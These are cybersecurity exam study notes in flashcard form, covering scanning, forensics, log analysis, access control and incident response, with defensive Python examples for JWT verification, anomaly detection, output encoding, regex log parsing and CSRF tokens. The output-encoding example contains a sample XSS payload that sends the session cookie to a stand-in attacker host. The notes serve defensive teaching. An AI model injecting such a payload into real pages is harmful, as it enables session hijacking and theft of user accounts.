a token format consisting of a header, payload (claims), and signature, each base64url-encoded and joined with dots, where the header and payload are JavaScript Object Notation (JSON) messages (widely used as OAuth access tokens and OIDC ID tokens, so the signature must be verified and the algorithm checked before any claim is trusted)
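As an added example (not from the original notes), a JWT signer and verifier for the HS256 (HMAC-SHA256) algorithm using only the standard library. The shared secret and claims are constructed; the verifier rejects tokens whose header does not say HS256, which is the check that defeats the "alg: none" and algorithm-confusion tricks.

```python
"""Added example, not from the original notes: build and verify an HS256 JWT
with the standard library. SECRET and the claims are constructed."""
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"  # assumption: the HMAC key shared by issuer and verifier

def b64url_encode(data: bytes) -> str:
    """JWT uses unpadded base64url."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Return header.payload.signature with an HMAC-SHA256 signature."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)

def verify_hs256(token: str, key: bytes):
    """Return the payload dict if the token is valid, otherwise None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
    except (ValueError, json.JSONDecodeError):
        return None
    # Pin the algorithm: never let the token choose it ("none", RS256->HS256 confusion)
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    # Constant-time comparison so the check does not leak via timing
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))
```

The payload is only decoded after the signature passes; decoding first and "checking later" is the pattern that lets forged claims slip into logic.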
regdump
a tool that dumps the contents of the registry in a text file with simple formatting so that you can search specific strings in the file using the 'find' command
curl
a tool to transfer data from or to a server using one of the supported protocols (HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, DICT, TELNET, LDAP, FILE) (used to test APIs)
Multi Router Traffic Grapher (MRTG)
a tool used to create graphs showing traffic flows through the network interfaces of routers and switches by polling the appliances using the Simple Network Management Protocol (SNMP)
HIDS/HIPS (endpoint protection tool)
a type of IDS/IPS that monitors a computer system for unexpected behavior or drastic changes to the system's state on an endpoint
Real-Time Operating System (RTOS)
a type of OS that prioritizes deterministic execution of operations to ensure consistent response for time-critical tasks
Programmable Logic Controller (PLC) (Embedded System)
a type of computer designed for deployment in an industrial or outdoor setting that can automate and monitor mechanical systems (runs on firmware which can be patched and reprogrammed to fix vulnerabilities)
System Isolation (Air Gap)
a type of network isolation that physically separates a network from all other networks
Session Hijacking
a type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address (can occur through the theft or modification of cookies)
Unified Extensible Firmware Interface (UEFI)
a type of system firmware providing support for 64-bit CPU operation at boot, full GUI and mouse operation at boot, and better boot security (Secure Boot, Measured Boot)
Containerization
a type of virtualization applied by a host operating system to provision an isolated execution environment for an application
Process Identification (PID)
a unique identification number of a process launched by a Linux system
parent process ID (PPID)
a unique identification number of the parent process for every process launched by a Linux system
Nmap Security Scanner
a versatile port scanner used for topology, host, service, and OS discovery and enumeration
Virtual Desktop Infrastructure (VDI) *
a virtualization implementation that separates the personal computing environment from a user's physical computer (disadvantage is that users have no local processing ability if the server or network is down)
Web Application Scanner
a vulnerability testing tool designed to identify issues with web servers and web applications (used to detect XSS, SQL injection, and other types of web attacks)
Remote Code Execution
a vulnerability that allows an attacker to transmit code from a remote host for execution on a target host or a module that exploits such a vulnerability
File Inclusion
a web application vulnerability that allows an attacker either to read a file from an arbitrary location on the host file system (local file inclusion, usually by way of directory traversal) or to load or upload an executable or script file to open a backdoor (remote file inclusion); it commonly relies on directory traversal but is a distinct vulnerability class
reference (rule options)
links the rule to an entry in an external attack database, such as a CVE identifier, a Bugtraq ID, or an advisory URL, so an analyst who sees the alert can look up what it relates to
Discretionary Access Control (DAC)
access control model where each resource is protected by an ACL managed by the resource's owner (e.g., Windows NTFS permissions)
Role-based Access Control (RBAC)
access control model where resources are protected by ACLs that are managed by administrators and that provide user permissions based on job functions
Mandatory Access Control (MAC)
access control model where resources are protected by inflexible, system-defined rules; each resource (object) and each user (subject) is allocated a clearance level (or label), and access is granted only when the labels permit it
Attribute-Based Access Control (ABAC)
access control technique that evaluates a set of attributes that each subject possesses to determine if access should be granted (can be used to implement controls for separation of duties)
Persistent Data Acquisition (Virtualization Forensics)
acquiring data from persistent devices, such as virtual hard drives and other virtualized mass storage devices to an image-based format
Taxonomy-based Approach (Impact Analysis)
an approach that defines incident categories at the top level, such as worm outbreak, phishing attempt, DDoS, external host/account compromise, or internal privilege abuse
Artificial Neural Networks (ANNs)
an architecture of input, hidden, and output layers that can perform algorithmic analysis of a dataset to achieve outcome objectives (a machine learning system adjusts its neural network to reduce errors and optimize objectives)
Integer Overflow
an attack in which a computed result is too large to fit in its assigned storage space, which may lead to crashing or data corruption, and may trigger a buffer overflow
Buffer Overflow
an attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory
XML External Entity (XXE)
an attack that abuses an XML parser's handling of external entity declarations so that a crafted document makes the server read a local file or fetch another resource (similar in effect to file inclusion); mitigated by disabling DTD and external entity processing in the parser
Coercive Parsing
an attack that modifies requests to a SOAP web service in order to cause the service to parse the XML-based requests in a harmful way (can cause an exploit to run or a DoS)
DDoS (Traffic Spikes)
an attack that uses multiple compromised hosts (a botnet) to overwhelm a service with request or response traffic
Prowler
an auditing tool for AWS that is used to evaluate the cloud infrastructure against AWS benchmarks, GDPR compliance, and HIPAA compliance
OpenID Connect (OIDC)
an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields (*OAuth is for authorization and OpenID Connect is used for authentication*)
Runbook
an automated version of a playbook that leaves clearly defined interaction points for human analysis
Spear Phishing
an email spoofing attack targeting a specific organization or individual by seeking unauthorized access to sensitive information
Passive Scan (Vulnerability Scanner Types)
an enumeration or vulnerability scan that analyzes only intercepted network traffic rather than sending probes to a target (commonly used for threat hunting)
Report Writing (post-incident activities)
an essential analyst skill that is used to communicate information about the incident to a wide variety of stakeholders (ex. executive summary)
SQL Event Logs
an event/error log that records events with fields like date, time, and the action taken, such as server startup, individual database startup, database cache clearing, and databases not starting or shutting down unexpectedly
Business Email Compromise (BEC)
an impersonation attack in which the attacker gains control of an employees account and uses it to convince other employees to perform fraudulent actions
Command and Control (C2)
an infrastructure of hosts and services with which attackers direct, distribute, and control malware over botnets
Python and Ruby (scripting tools)
interpreted, high-level, general-purpose programming languages used heavily by cybersecurity analysts and penetration testers
Zeek (IDS/IPS Configuration tool)
an open-source IDS for UNIX/Linux platforms that contains a scripting engine which can be used to act on significant events (notices) by generating an alert or implementing some sort of shunning mechanism
Security Onion (IDS/IPS Configuration tool)
an open-source Linux-based platform (SIEM) for security monitoring, incident response, and threat hunting and it bundles together a lot of different tools like Snort, Suricata, Zeek, Wireshark and NetworkMiner with log management and incident management tools
Graylog
an open-source SIEM with an enterprise version focused on compliance and supporting IT operations and DevOps
Pacu
an open-source cloud penetration testing framework to test the security configuration of an AWS account
Scalpel
an open-source command line file carving tool (derived from Foremost) that is used alongside The Sleuth Kit to recover files from disk images on Linux and Windows systems
The Sleuth Kit *
an open-source digital forensics collection of command line tools and programming libraries for disk imaging and file analysis that interfaces with Autopsy as a graphical user-front end interface (* free open source solution)
OWASP Zed Attack Proxy (ZAP)
an open-source interception proxy and web application vulnerability assessment tool written in Java (includes crawlers to automate the discovery of links and content within a web application)
The Volatility Framework
an open-source memory forensics tool that has many different modules for analyzing specific elements of memory such as a web browser module, command prompt history module, and others
Snort (IDS/IPS Configuration tool)
open-source software available for Windows and selected Linux distributions that can operate in IDS or IPS mode
ScoutSuite
an open-source tool written in Python that can be used to audit instances and policies created on multicloud platforms, including AWS, Azure, and Google Cloud Platform
DevOps
an organizational culture shift that combines software development and systems operations by referring to the practice of integrating the two disciplines within a company (operations and developers can build, test, and release software faster and more reliably)
Rogue Devices
an unauthorized device or service, such as a wireless access point, DHCP server, or DNS server, on a corporate or private network that allows unauthorized individuals to connect to the network or intercept its traffic
Post-Incident Activity (Incident Response Phases)
analyze the incident and responses to identify whether procedures or systems could be improved
nmap -sI (TCP Idle Scan)
another stealth method, this scan makes it appear that another machine (a zombie) started the scan to hide the true identity of the scanning machine
Response Code 500-599 (URL Analysis)
any code in this range indicates a server-side issue
Response Code 400-499 (URL Analysis)
any code in this range indicates an error in the client request
Response Code 300-399 (URL Analysis)
any code in this range indicates that a redirect has occurred by the server
What information should be recorded on a chain of custody form during a forensic investigation?
any individual who worked with evidence during the investigation
Shellcode
any lightweight code designed to run an exploit on the target, which may include any type of code format from scripting languages to binary code
Snowflake Systems
any system that is different in its configuration compared to a standard template within an infrastructure as code (IaC) architecture (lack of consistency leads to security issues and inefficiencies in support)
track (rule options)
an argument of a threshold option that rate-limits the rule by tracking event counts per source (by_src) or per destination (by_dst), so the rule fires only when the number of matching events passes the threshold within the stated number of seconds (ex. flag a source that connects many times in a minute, but ignore one that connects once an hour)
MAC filtering
applying an ACL to a switch or access point so that only clients with approved MAC addresses can connect to it
VM Introspection (VMI)
uses tools installed on the hypervisor to retrieve pages of a guest VM's memory for analysis without installing an agent inside the guest
statistical deviation analysis
uses the concept of mean and standard deviations to determine if a data point should be treated as suspicious
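As an added example (not from the original notes), the mean and standard deviation test applied to a constructed series of daily outbound volumes for one host, with a rolling version that judges each day only against the days before it. The numbers and the 3-sigma threshold are constructed for illustration.

```python
"""Added example, not from the original notes: statistical deviation analysis
using mean and standard deviation (z-score). The baseline series is constructed."""
import statistics

# Constructed: outbound megabytes per day for one host over two weeks
BASELINE = [120, 131, 118, 125, 140, 122, 128, 135, 119, 127, 133, 121, 126, 130]

def zscore(value, baseline):
    """How many standard deviations `value` lies from the baseline mean."""
    mean = statistics.mean(baseline)
    stdev = statistics.stdev(baseline)     # sample standard deviation
    return (value - mean) / stdev

def is_suspicious(value, baseline, threshold=3.0):
    """Treat a point more than `threshold` sigma from the mean as suspicious."""
    return abs(zscore(value, baseline)) > threshold

def flag_anomalies(series, min_history=7, threshold=3.0):
    """Rolling check: each day is compared with the days before it only,
    so the baseline is not contaminated by the point being judged.
    Returns the indices of flagged days."""
    flagged = []
    for i in range(min_history, len(series)):
        if is_suspicious(series[i], series[:i], threshold):
            flagged.append(i)
    return flagged
```

The caveat a practitioner should keep in mind: once a 900 MB day enters the history, the standard deviation balloons and a following 128 MB day (or a second large transfer) looks normal, and an adversary who grows volume slowly (the sparse delivery noted later in these notes) never crosses the threshold at all; pair this test with trend analysis rather than relying on it alone.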
Deceive
supply false information to distort the adversary's understanding and awareness (ex. DNS redirect, honeypot)
Saved State Files (Virtualization Forensics)
the memory files written when a VM is suspended (its saved state) can be loaded directly into a memory analysis tool
Why do we use a SPAN?
because network traffic must be captured and its data frames decoded before it can be analyzed
TTP (Tactics, Techniques, and Procedures)
behavior patterns that were used in historical cyber-attacks and adversary actions
Threat hunting and security monitoring must use ___________ techniques to identify infections
behavioral-based
User Acceptance Testing (UAT)
beta testing by the end users that proves a program is usable and fit-for-purpose in real-world conditions
Reputation data
blacklists of known threat sources, such as malware signatures, IP address ranges, and DNS domains
How do you prevent firewalking?
block outgoing ICMP TTL-exceeded (status) messages at the firewall, so the attacker's TTL-based probes get no reply revealing which ports the firewall passes
How can WPS brute force attempts be mitigated?
by enabling rate-limiting for PIN authentications (*Important Note* ALWAYS disable WPS in your wireless networks)
Output Encoding
coding methods to sanitize output by converting untrusted output into a safe form where the input is displayed as data to the user without executing as code in the browser (mitigates against code injection and XSS attacks that attempt to use input to run a script)
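As an added example (not from the original notes), the same untrusted comment rendered with and without HTML encoding, in both element and attribute context, using Python's standard html module. The template fragments and the payload string are constructed for illustration.

```python
"""Added example, not from the original notes: output encoding for HTML
element and attribute contexts. Templates and payloads are constructed."""
import html

def render_unsafe(comment):
    """Untrusted text dropped straight into markup: the browser parses it as HTML."""
    return f'<p class="comment">{comment}</p>'

def render_encoded(comment):
    """Encode <, >, &, \" and ' so the text is displayed as data, not executed."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'

def render_attribute(value):
    """Attribute context: quotes must be encoded too, otherwise the value can
    close the attribute and add an event handler."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'

# Constructed XSS payload that tries to exfiltrate the session cookie
PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

def contains_executable_markup(fragment):
    """Crude check used in the tests: does a script tag survive into the output?"""
    return "<script" in fragment.lower()
```

Encoding is context-specific: `html.escape` is right for element text and quoted attributes, but output placed inside a JavaScript block or a URL needs the encoding for that context instead.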
lsof -u root -a -p 1645
command that lists all files currently open on this computer that were opened by the user root AND (the -a flag combines the conditions) that belong to process ID 1645
du /var/log
command that tells us how much space the log directory is using on this particular computer/host
Building Automation System (BAS)
components and protocols that facilitate the centralized configuration and monitoring of mechanical and electrical systems within offices and data centers
nmap -sU (UDP Scan)
conducts a scan by sending a UDP packet to the target and waiting for a response or timeout
nmap -sX (Xmas Scan)
conducts a scan by sending a packet with the FIN, PSH, and URG flags set to one
nmap -sN (Null Scan)
conducts a scan by sending a TCP packet with no flags set (all flag bits zero)
nmap -sF (FIN Scan)
conducts a scan by sending an unexpected FIN packet
nmap -p (Port Range)
conducts a scan by targeting the specified ports instead of the default of the 1,000 most commonly used ports
nmap -sT (TCP Connect)
conducts a three-way handshake scan by sending a SYN packet to identify the port state and then sending an ACK packet once the SYN-ACK is received
nmap -sS (TCP SYN)
conducts half-open scan by sending a SYN packet to identify the port state without sending an ACK packet afterwards (requires root/administrator access to perform)
DNS Event Logs
contains a log of all the different events for each time the DNS server handles a request to convert between a domain name and an IP address
Work Product Retention
contractual method of retaining (hiring) forensic investigators so that their analysis is protected from disclosure by the work product doctrine
Access Complexity (AC) (CVSS)
Attack Complexity in CVSS v3 (called Access Complexity in v2), expressed as high (H) or low (L)
Listener/Collector (Data Normalization)
hosts are configured to push updates to the SIEM server using a protocol like syslog or SNMP
Attribution
identification and publication of an attacker's methods, techniques, and tactics as useful threat intelligence
Framework Core
identifies five cybersecurity functions (Identify, Protect, Detect, Respond, and Recover) and each function can be divided into categories and subcategories
User-Agent Field
identifies the type of application making the request, such as the web browser version or the client's operating system
Detect
identify the presence of an adversary and the resources at their disposal (ex. Web analytics, NIDS, Vigilant user, HIDS, Audit log)
When is Sinkholing better than Blackholing?
if you want to determine the cause of the DDoS attack
VirusTotal (EDR Configuration)
inspects items with over 70 antivirus scanners and URL/domain blacklisting services, in addition to a myriad of tools to extract signals from the studied content
patching
installing a set of changes to a computer program or its supporting data designed to update, to fix, or to improve it (process: scan, patch, scan)
*Important Note* Analysts should always have forensic workstations prohibited from accessing the
internet (if it is connected, the forensic workstation could be compromised with malware or a remote access trojan, undermining the integrity of the evidence)
Correlation
interpreting the relationship between individual data points to diagnose incidents of significance to the security team
Disruption
interrupt an adversary's communications or frustrate or confuse their efforts (ex. in-line AV, DEP, NIPS)
Containment (Incident Response Phases)
limit the scope and magnitude of the incident by securing data and limiting impact to business operations and your customers
nmap -sL (List Scan)
lists the IP addresses from the supplied target range(s) and performs a reverse-DNS query to discover any host names associated with those IPs (similar to DNS lookup)
Insufficient Logging and Monitoring (Cloud Threats)
logs must be copied to non-elastic storage for long-term retention (*WARNING: SaaS may not supply access to log files or monitoring tools)
Processor Security Extensions
low-level CPU changes and instructions that enable secure processing (built into your microprocessor) 1. AMD: Secure Memory Encryption (SME) & Secure Encrypted Virtualization (SEV) 2. Intel: Trusted Execution Technology (TXT) & Software Guard Extensions (SGX)
_________ is expressed as a monetary value
magnitude
Obfuscated Malware Code
malicious code whose execution the malware author has attempted to hide through various techniques such as compression, encryption, or encoding to severely limit attempts to statically analyze the malware
Commodity Malware
malicious software applications that are widely available for sale or easily obtainable and usable
________ is still likely to leave metadata on the file system even if it is fileless
malware
Dropper
malware designed to install or run other types of malware embedded in a payload on an infected host (stage 1)
Volume-based Analysis
measures a metric based on the size of something, such as disk space used or log file size
flow (rule options)
matches a new or existing TCP connection OR matches regardless of the TCP connection state
*Important Note* While most of the Windows registry is stored on the disk, some keys (like HKLM/Hardware) are only stored in memory so you should analyze the Registry via a
memory dump
[ ] (regex syntax)
matches a single instance of a character within the brackets, such as [a-z] (lowercase letter), [A-Z] (uppercase letter), [0-9] (number), [a-zA-Z0-9] (finds me an uppercase, lowercase, or number as a single digit or single character from that range), [\s] (white space), or [\d] (single digit)
+ (regex syntax)
matches one or more occurrences and is called a quantifier, such as \d+ matching one or more digits
? (regex syntax)
matches one or none times, such as \d? matching zero or one digits
{ } (regex syntax)
matches the number of times within the curly braces, such as \d{3} matching exactly three digits or \d{7,10} matching seven to ten digits
* (regex syntax)
matches zero or more occurrences, such as \d* matching zero or more digits
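The syntax above, as an added example that is not part of the original notes: a Python pattern built from those character classes and quantifiers to parse constructed sshd log lines and count failures per source. The log lines, hostnames and addresses are constructed for illustration.

```python
"""Added example, not from the original notes: regex character classes and
quantifiers applied to constructed sshd log lines."""
import re
from collections import Counter

# Constructed syslog-style sshd records
LOG_LINES = [
    "Mar  3 10:15:02 host1 sshd[2201]: Failed password for invalid user admin from 203.0.113.45 port 51234 ssh2",
    "Mar  3 10:15:04 host1 sshd[2201]: Failed password for root from 203.0.113.45 port 51240 ssh2",
    "Mar  3 10:15:07 host1 sshd[2203]: Accepted password for alice from 10.0.0.5 port 40112 ssh2",
    "Mar 12 08:01:33 host1 sshd[2310]: Failed password for bob from 198.51.100.9",
]

# [A-Z][a-z]{2}            month: one uppercase then exactly two lowercase letters
#  +                       one or more spaces (syslog pads single-digit days)
# \d{1,2}                  one or two digits for the day
# (?:invalid user )?       the ? quantifier applied to an optional literal group
# (?:\d{1,3}\.){3}\d{1,3}  IPv4: three repetitions of 1-3 digits plus a dot, then 1-3 digits
# (?: port (?P<port>\d+))? port is optional, so the last line above still parses
SSHD_RE = re.compile(
    r"^(?P<month>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>[a-zA-Z0-9_-]+) sshd\[(?P<pid>\d+)\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>[a-zA-Z0-9_]+) "
    r"from (?P<ip>(?:\d{1,3}\.){3}\d{1,3})(?: port (?P<port>\d+))?"
)

def parse_sshd(line):
    """Return the named groups as a dict, or None when the line does not match."""
    m = SSHD_RE.match(line)
    return m.groupdict() if m else None

def failed_logins_by_source(lines):
    """Count Failed password events per source IP (a common brute-force indicator)."""
    counts = Counter()
    for line in lines:
        rec = parse_sshd(line)
        if rec and rec["result"] == "Failed":
            counts[rec["ip"]] += 1
    return dict(counts)
```

Named groups `(?P<name>...)` are the practical addition to the syntax in the notes: they let the rest of the pipeline refer to fields by name instead of by group number.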
Document Matching (DLP Discovery and Classification)
matching based on an entire or partial document based on hashes
Watermarking
methods and technologies that apply a unique anti-tamper signature or message to a copy of a document
URL Modifier
modifiers that can be added to the results page to affect the results, such as &pws=0 (means dont give me personalized results), &filter=0 (means dont filter the results) , and &tbs=li:1 (means do not autocorrect my search items)
"Smash the Stack"
occurs when an attacker overflows a stack buffer to overwrite the saved return address; the overflow typically precedes the payload with a NOP sled (a run of no-operation instructions) so that a return address landing anywhere in the sled slides forward into the attacker's shellcode
Service Defacement (Anomalous Activity)
occurs when an attacker gains control of a web server and alters the websites presentation
File carving ... (Virtualization Forensics)
of a virtual machine's virtualized hard drive can identify files in the unallocated and slack space of disk images
________ and ________ is used to interpret data from different formats and standardize them into a single format for analysis and processing (Data Normalization)
parsing + normalization
Web Application Firewall
protects web applications from a variety of application layer attacks such as XSS, SQL injection, code injection, etc.
Continuous Diagnostics and Mitigation (CDM)
provides US government agencies and departments with capabilities and tools to identify cybersecurity risks on an ongoing basis, prioritize these risks based upon potential impacts, and enable cybersecurity personnel to mitigate the most significant problems
DomainKeys Identified Mail (DKIM)
provides a cryptographic authentication mechanism for mail utilizing a public key published as a DNS record
Google Hacking Database (GHDB)
provides a database of search strings optimized for locating vulnerable websites and services
Degrade
reduce an adversary's capabilities or functionality, perhaps temporarily (ex. Queuing, Tarpit, Quality of Service)
Physical Network (Network Architectures)
refers to the cabling, switch ports, router ports, and wireless access points that supply cabled and wireless network access and connectivity (also includes physical security controls that are important in protecting your physical network architecture)
recycled threats
refers to the process of combining and modifying parts of existing exploit code to create new threats that are not as easily identified by automated scanning
Eradication & Recovery (Incident Response Phases)
remove the cause of the incident and bring the system back to a secure state
Destroy
render an adversary's resources permanently useless or ineffective
How do you prevent CSRF attacks?
require a unique, unpredictable per-session (anti-CSRF) token in all state-changing form submissions and reject any request whose token is missing or does not match the session
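As an added example (not from the original notes), a server-side anti-CSRF token store and the check a state-changing handler performs, using the standard secrets and hmac modules. The session identifiers, form fields and status codes are constructed for illustration.

```python
"""Added example, not from the original notes: per-session anti-CSRF tokens
with a constant-time comparison. Session IDs and form fields are constructed."""
import hmac
import secrets

class CsrfProtector:
    """Issues one random token per session and validates submitted tokens."""

    def __init__(self):
        self._tokens = {}  # session_id -> current token (server-side only)

    def issue(self, session_id):
        """Generate a fresh token for this session (embedded in the form as a hidden field)."""
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def validate(self, session_id, submitted):
        """True only if the submitted token matches the one issued to this session."""
        expected = self._tokens.get(session_id)
        if expected is None or submitted is None:
            return False
        # compare_digest avoids leaking the token through timing differences
        return hmac.compare_digest(expected, submitted)

def handle_transfer(protector, session_id, form):
    """Simulated state-changing POST handler: 403 when the token is absent or wrong,
    200 when the token proves the request came from a page the server served
    to this session (a cross-site page cannot read that token)."""
    if not protector.validate(session_id, form.get("csrf_token")):
        return 403
    return 200
```

A forged cross-site request carries the victim's session cookie automatically, but not the token, which only the legitimate page can read; binding the token to the session (rather than accepting any issued token) is what stops an attacker from substituting one from their own session.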
Stack
reserved area of memory where the program saves the return address when a function call instruction is received
What is a key indicator of malicious activity?
resource consumption
HEAD (URL Analysis)
retrieves the headers for a resource only and ignores the body
cut -c5 syslog.txt
returns only the fifth character in each line from the syslog.txt file
cut -c5-10 syslog.txt
returns only the fifth through tenth characters in each line from the syslog.txt file
sort syslog.txt
returns the contents of the syslog.txt file in alphabetical order (a-z)
sort -n syslog.txt
returns the contents of the syslog.txt file in numerical order (0-9)
sort -k2 syslog.txt
returns the contents of the syslog.txt file in order based on the column specified, in this case the second column
sort -t "," -k2 syslog.txt
returns the contents of the syslog.txt file in order based on the column specified, such as the second column, while delimiting the columns using comma separated values
sort -r syslog.txt
returns the contents of the syslog.txt file in reverse alphabetical order (z-a)
cut -d " " -f1-4 syslog.txt
returns the first four entries of each line as delimited by the " " (space character)
Reflected, non-persistent, and persistent XSS attacks occur as ________ scripting attacks
server-side (the vulnerable code runs on the web server even though the injected script executes in the victim's browser; DOM-based XSS is the client-side variant)
Always use ________ _______ to conduct credentialed scans, not local administrative privileges
service accounts
Federal Information Security Management Act (FISMA)
sets forth the requirements for federal organizations to adopt information assurance controls
Sarbanes-Oxley Act (SOX)
sets forth the requirements for the storage and retention of documents relating to an organization's financial and business operations, including the type of documents to be stored and their retention periods (applies to publicly traded companies)
Gramm-Leach-Bliley Act (GLBA)
sets forth the requirements that help protect the privacy of an individual's financial information that is held by financial institutions and others
Health Insurance Portability and Accountability Act (HIPAA)
sets forth the requirements that help protect the privacy of an individual's health information that is held by healthcare providers, hospitals, and insurance companies
You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and causes an impact on the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why?
syslog
The ____ command allows you to see the 10 most recent log entries in a file
tail
Risk Identification
takes place by evaluating threats, identifying vulnerabilities, and assessing the probability of an event affecting an asset or process
attackers can use _________ techniques to bury their attacks within the network noise
sparse attack (trend analysis can be used to identify these attacks)
Adversaries often use _______ _______ to reduce packets sizes and hide in the noise of the other network traffic
sparse delivery
IOC for Data Exfiltration Using HTTP
spikes in requests to PHP files or other scripts, and unusually large HTTP response packets
Maximum Tolerable Downtime (MTD) *
the longest period of time a business can be inoperable without causing irrevocable business failure
Recovery Point Objective (RPO) *
the longest period of time that an organization can tolerate lost data being unrecoverable (focused on how long you can be without your data)
Zones
the main unit of a logically segmented network (using ACLs) where the security configuration is the same for all hosts within it (e.g., DMZ)
Data Acquisition
the method and tools used to create a forensically sound copy of data from a source device, such as system memory or a hard disk
Client-based Error Codes
status codes in the 400 range
Server-based Error Codes
status codes in the 500 range
Covert Channels can be created using different ________ and ________ methods
storage, timing
Agent-based Scanning
the vulnerability scanning is conducted using a software application installed locally on each target
Server-based Scanning (Vulnerability Scanner Types)
the vulnerability scanning is launched from one or more scanning servers against the targets (ex. Nessus)
sid and rev (rule options)
sid is the Snort ID, a unique identifier for the rule; rev is the revision number (version) of that rule
Port 3306 (TCP)
MySQL (MySQL database connection)
Port 4500 (UDP port)
NAT-T-IKE (used to set up IPsec traversal through a NAT gateway)
systemctl
Linux command that can list and monitor the startup processes using the appropriate control for the init daemon (startup process that happens every time you start the Linux system)
top
Linux command that creates a scrollable table of every running process and is constantly refreshed so that you see the most up-to-date statistics
faillog (new accounts)
Linux command that displays only authentication failures
chmod
Linux command that is used to modify permissions for files
chown
Linux command that is used to modify the owner of a file
free
Linux command that outputs a summary of the amount of used and freely available memory on the computer
lastlog (new accounts)
Linux command that retrieves the log-on history from the /var/log/lastlog file and displays the account name, the TTY, the remote host, and the last time the user was logged in
who (new accounts)
Linux command that shows what user accounts are logged in, what terminal teletypes (TTYs) they have active for each running process, and what date/time they logged in (useful for adversary hunting)
du
Linux tool that retrieves how much disk space each directory is using, starting from the specified directory
lsof
Linux tool that retrieves a list of all files currently open on the OS (can quickly get a list of all resources a process is currently using)
df
Linux tool that retrieves how much disk space is being used by all mounted file systems and how much space is available for each
how do you create a search query to send an alert if multiple user log-on failures occur within one hour from a single account
Select (user) Where (Error.LogonFailure > 3 AND LogonFailure.User AND Duration < 1 hour) Sorted By (date, time)
A company's NetFlow collection system can handle up to 2 Gbps. Due to excessive load, this has begun to approach full utilization at various times of the day. If the security team does not have additional money in their budget to purchase a more capable collector, which of the following options could they use to collect useful data?
enable sampling of the data
Collection (Forensic Procedures)
ensure authorization to collect evidence is obtained (e.g., warrant), and then document and prove the integrity of evidence as it is collected
logging
ensure that scanning and monitoring/log retrieval systems are functioning properly following the incident
Identification (Forensic Procedures)
ensure the scene is safe, secure the scene to prevent evidence contamination, and identify the scope of evidence to be collected
A cybersecurity analyst is conducting proactive threat hunting on a network by correlating and searching the Sysmon and Windows Event logs. The analyst uses the following query as part of their hunt: Query: "mimikatz" NOT "EventCode=4658" NOT "EventCode=4689" EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess -- Based on the query above, which of the following potential indicators of compromise is the threat hunter relying on?
unauthorized software
Scope (S) (CVSS)
unchanged (U) or changed (C)
a ________ rootkit is able to gain complete control over the system
kernel mode (more dangerous)
Segmentation Containment
- a mitigation strategy that achieves the isolation of a host or group of hosts using network technologies and architecture - uses VLANs, routing/subnets, and firewall ACLs to prevent communication outside the protected segment (ex. sandboxing, honeypots) - can be used to reroute adversary traffic as part of a deception defensive capability
Isolation Containment
- a mitigation strategy that involves removing an affected component from whatever larger environment it is a part of - ensure there is no longer an interface between the affected component and your production network or the Internet (ex. airgap)
Kill Chain (Attack Framework)
- a model developed by Lockheed Martin that describes the stages by which a threat actor progresses a network intrusion - 7 stages (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control, Actions on Objectives)
Behavioral Analysis
- a network monitoring system that detects changes in normal operating data sequences and identifies abnormal sequences - generates an alert whenever anything deviates outside a defined level of tolerance from a given baseline (outliers)
Anomaly Analysis
- a network monitoring system that uses a baseline of acceptable outcomes or event patterns to identify events that fall outside the acceptable range - generates an alert on any event or outcome that doesn't follow a set pattern or rule
Event Logs
- logs created by the operating system on each client or server to record how users and software interact with the system - event logs provide the name of the event, details of any errors, the event ID, the source of the event and a description of what the warning/error means
Preparation (Incident Response Phases)
- make the system resilient to attack by hardening systems, writing policies and procedures, and setting up confidential lines of communication - preparing for an incident response involves documenting your procedures, putting resources and procedures in place, and conducting training
Industrial Control Systems (ICS)
- a network that manages embedded systems (one plant) - used for electrical power stations, water suppliers, health services, telecommunications, manufacturing, and defense needs - manages the process automation by linking together PLCs using a fieldbus to make changes in the physical world (valves, motors, etc)
Distributed Reflection DoS (DRDoS) Attack
- a network-based attack where the attacker dramatically increases the bandwidth sent to a victim during a DDoS attack by implementing an amplification factor - occurs when the adversary spoofs the victim's IP address and tries to open connections with multiple servers
Lateral Movement
- a technique to progressively move through a network to search for the key data and assets that are ultimately the target of an attack campaign - identifying irregular peer-to-peer communication can identify lateral movement
Supervisory Control and Data Acquisition (SCADA)
- a type of industrial control system (ICS) that manages large-scale, multiple-site devices and equipment spread over a geographic region (multiple plants) - typically run as software on ordinary computers to gather data from and manage plant devices and equipment with embedded PLCs
Reverse Proxy
- a type of proxy server that protects servers from direct contact with client requests - logs from a reverse proxy can be analyzed for indicators of attack or compromise, such as malicious code in HTTP request headers and URLs
Port 23 (TCP)
Telnet (an unsecure remote administration interface)
How can you detect privilege escalation? *
- by monitoring authentication and authorization systems (5 things to look for below) 1. unauthorized sessions 2. failed log-ons 3. new accounts 4. guest account usage 5. off-hours usage
Blackholing *
- can be used to stop a DDoS attack at the routing layer by sending traffic to the null0 interface - useful against Dark Nets - redirect all Dark Nets to a black hole until they are needed for business operations
Live Acquisition (System Memory Image Acquisition)
